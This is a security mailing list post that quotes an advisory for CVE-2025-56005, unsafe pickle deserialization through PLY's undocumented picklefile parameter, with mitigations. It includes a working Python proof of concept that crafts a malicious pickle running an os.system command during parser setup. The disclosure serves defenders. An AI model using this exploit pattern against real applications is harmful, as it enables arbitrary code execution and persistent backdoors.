Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) File archive & mirrors How to verify digital signatures OVE IDs What's new

Message-ID: <7d323bf4-91fb-4bee-aed4-e5f3757c3631@oracle.com>
Date: Fri, 23 Jan 2026 11:06:24 -0800
From: Alan Coopersmith <alan.coopersmith@...cle.com>
To: oss-security@...ts.openwall.com
Subject: CVE-2025-56005 Undocumented RCE in PLY via
 `picklefile` Parameter

https://github.com/bohmiiidd/Undocumented-RCE-in-PLY claims:

> Undocumented Remote Code Execution in PLY CVE-2025-56005
> --------------------------------------------------------
> 
> CVE ID: CVE-2025-56005
> Reported by: Ahmed Abd
> Disclosure Date: July 1, 2025
> Affected Product: PLY (Python Lex‑Yacc)
> Affected Version: 3.11 (PyPI distribution)
> Vendor: PLY (Python Lex‑Yacc)
> Affected Component:** ply/yacc.py` — `LRTable.read_pickle()` via `yacc(picklefile=...)`
> 
> ## Summary
> 
> An undocumented and unsafe feature in the PyPI‑distributed version of PLY 3.11
> allows arbitrary code execution when the `yacc()` function is invoked with the
> `picklefile` parameter.
> 
> The `picklefile` parameter causes PLY to deserialize a `.pkl` file using
> Python’s `pickle.load()` **without validation**. Because Python’s `pickle`
> module supports execution of arbitrary code during deserialization (e.g.,
> via `__reduce__()`), an attacker who can control the supplied pickle file
> can execute arbitrary code during parser initialization.
> 
> This parameter is *not documented* in the official PLY documentation or
> GitHub repository, yet it is active in the PyPI release.
> 
> ---
> 
> ## Impact
> 
> attacker can control, replace, or influence the `.pkl` file passed to
> `yacc(picklefile=...)`, they can achieve:
> 
> * Arbitrary code execution
> * Execution during application startup
> * Code execution before any parsing logic is reached
> 
> This may affect applications that load parser tables from:
> 
> * Cached locations
> * Shared directories
> * CI/CD pipelines
> * Configurable or writable paths
> 
> ---
> 
> ## Vulnerability Details
> 
> * **Vulnerability Type:** Arbitrary Code Execution
> * **Attack Type:** Context‑dependent
> * **Attack Vector:** Unsafe deserialization of attacker‑controlled pickle file
> * **Impact:** Code execution
> * **CWE:** CWE‑502 (Deserialization of Untrusted Data)
> 
> ### Affected Functionality
> 
> * `ply.yacc.yacc(picklefile=...)`
> * `LRTable.read_pickle()` in `ply/yacc.py`
> 
> ---
> 
> ## Additional Information (Context & Risk)
> 
> This vulnerability presents elevated risk due to its stealthy nature and
> potential for persistence.
> 
> The `picklefile` parameter is *undocumented* in the official PLY documentation
> and GitHub repository. However, the PyPI‑distributed version of PLY 3.11
> includes this functionality and processes the supplied file using
> `pickle.load()` without validation.
> 
> Because Python’s `pickle` module permits execution of embedded code during
> deserialization, a malicious pickle file can execute arbitrary code *during
> parser setup*, before any parsing logic is invoked.
> 
> At the time of writing, the maintainer has not publicly acknowledged this
> behavior.
> 
> This functionality can be abused to introduce persistent backdoors,
> particularly in environments where parser table files are:
> 
> * Cached on disk
> * Shared between users or services
> * Generated or reused in CI/CD pipelines
> * Loaded from configurable or writable paths
> 
> Given the lack of documentation, silent execution path, and the high impact
> of unsafe deserialization, a CVE assignment is warranted to raise awareness
> and protect downstream users.
> 
> ---
> 
> ## Proof of Concept (PoC)
> 
> This proof of concept demonstrates arbitrary code execution when a
> malicious pickle file is supplied via the undocumented `picklefile` parameter.
> 
> ### PoC Overview
> 
> The PoC:
> 
> * Defines a minimal lexer and parser
> * Crafts a malicious pickle payload
> * Executes a system command during deserialization
> 
> ### Expected Result
> 
> When `yacc(picklefile='exploit.pkl')` is invoked, arbitrary code is executed
> during parser initialization.
> 
> ```python
> import pickle
> import os
> from ply.lex import lex
> from ply.yacc import yacc
> 
> tokens = ('EXAMPLE',)
> 
> def t_EXAMPLE(t):
>     r'example'
>     return t
> 
> def p_sample(p):
>     'sample : EXAMPLE'
>     pass
> 
> class Exploit:
>     def __reduce__(self):
>         cmd = 'touch /tmp/pwned && echo "VULNERABLE" > /tmp/pwned'
>         return (os.system, (cmd,))
> 
> malicious_data = {
>     '_tabversion': '3.11',
>     '_lr_action': {0: {}},
>     '_lr_goto': {0: {}},
>     '_lr_productions': [
>         (None, 0, 0, 0, Exploit())
>     ],
>     '_lr_method': 'LALR'
> }
> 
> with open('exploit.pkl', 'wb') as f:
>     pickle.dump(malicious_data, f)
> 
> parser = yacc(picklefile='exploit.pkl', debug=False, write_tables=False)
> parser.parse('example')
> ```
> 
> ---
> 
> ## Mitigation
> 
> * Do *not* use the `picklefile` parameter with untrusted or externally
>   writable files
> * Avoid loading parser tables from user‑controlled locations
> * Treat all pickle files as *unsafe input*
> * Prefer regenerating parser tables rather than loading them from disk
> 
> ---
> 
> 
> ## References
> 
> * PLY GitHub Repository: https://github.com/dabeaz/ply
> * PyPI Package: https://pypi.org/project/ply/
> * Python Pickle Documentation: https://docs.python.org/3/library/pickle.html
> * Proof of Concept Repository:
>   https://github.com/bohmiiidd/Undocumented-RCE-in-PLY

Of note, https://github.com/dabeaz/ply now bears a banner:
"This repository was archived by the owner on Dec 21, 2025. It is now read-only."

-- 
         -Alan Coopersmith-                 alan.coopersmith@...cle.com
          Oracle Solaris Engineering - https://blogs.oracle.com/solaris

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.